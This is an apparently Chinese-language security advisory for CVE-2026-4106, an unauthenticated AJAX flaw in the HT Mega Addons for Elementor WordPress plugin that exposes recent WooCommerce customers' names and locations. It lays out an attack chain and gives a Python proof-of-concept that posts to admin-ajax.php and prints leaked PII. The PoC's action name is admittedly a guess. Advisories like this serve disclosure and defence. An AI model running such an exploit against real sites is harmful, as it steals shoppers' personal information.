IPBUF安全漏洞报告
English
CVE-2026-4106 CVSS 5.3 中危

CVE-2026-4106 HT Mega插件未认证信息泄露漏洞

披露日期: 2026-04-23
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-4106
漏洞类型
信息泄露
CVSS评分
5.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
HT Mega Addons for Elementor

相关标签

信息泄露WordPressWooCommerce未认证访问PIICVE-2026-4106

漏洞概述

HT Mega Addons for Elementor WordPress插件在3.0.7版本之前存在安全漏洞。该插件包含一个未经过身份验证的AJAX操作,允许未经授权的访问。攻击者利用此漏洞可获取过去7天内下单客户的敏感个人信息(PII),包括全名、城市、州和国家等,导致严重的用户隐私泄露风险。

技术细节

该漏洞源于插件在处理AJAX请求时未实施严格的权限控制。插件注册了一个未认证的AJAX动作(通常通过wp_ajax_nopriv_钩子),使得任何用户(包括未登录访客)均可触发特定的回调函数。当攻击者向/wp-admin/admin-ajax.php发送包含特定action参数的POST请求时,服务器端代码直接查询数据库(通常是WooCommerce订单表)获取最近7天的订单记录。系统随后将这些包含客户姓名、地址等PII的数据以JSON格式返回。由于缺乏身份验证检查,攻击者可以批量遍历目标以窃取数据。

攻击链分析

STEP 1
侦察
攻击者识别目标网站是否安装了HT Mega Addons for Elementor插件,并确认其版本低于3.0.7。
STEP 2
漏洞利用
攻击者构造一个针对WordPress admin-ajax.php的POST请求,在请求体中包含触发信息泄露的特定action参数。
STEP 3
数据获取
服务器端接收到请求后,由于缺乏认证检查,直接执行查询逻辑并返回过去7天内订单的客户姓名、地址等敏感信息。
STEP 4
数据窃取
攻击者解析服务器返回的JSON数据,提取并存储受害者的个人身份信息(PII)。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (replace with actual target) target_url = "http://example.com/wp-admin/admin-ajax.php" # The specific action name may vary based on plugin version or configuration # This is a representative example of the exploit payload. payload = { "action": "ht_mega_get_recent_orders", # Example action name, verify in source code "security": "" # If nonce is required, this might be empty or bypassed } try: # Sending unauthenticated POST request response = requests.post(target_url, data=payload) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Response content:") print(response.text) # Check if PII data is present in the response if "full_name" in response.text or "city" in response.text: print("[!] Potential PII data leaked!") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

HT Mega Addons for Elementor < 3.0.7

防御指南

临时缓解措施
建议立即升级插件至修复版本。若暂时无法升级,应限制对WordPress AJAX接口的外部访问,或禁用插件的相关功能模块,以防止敏感数据被未授权获取。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表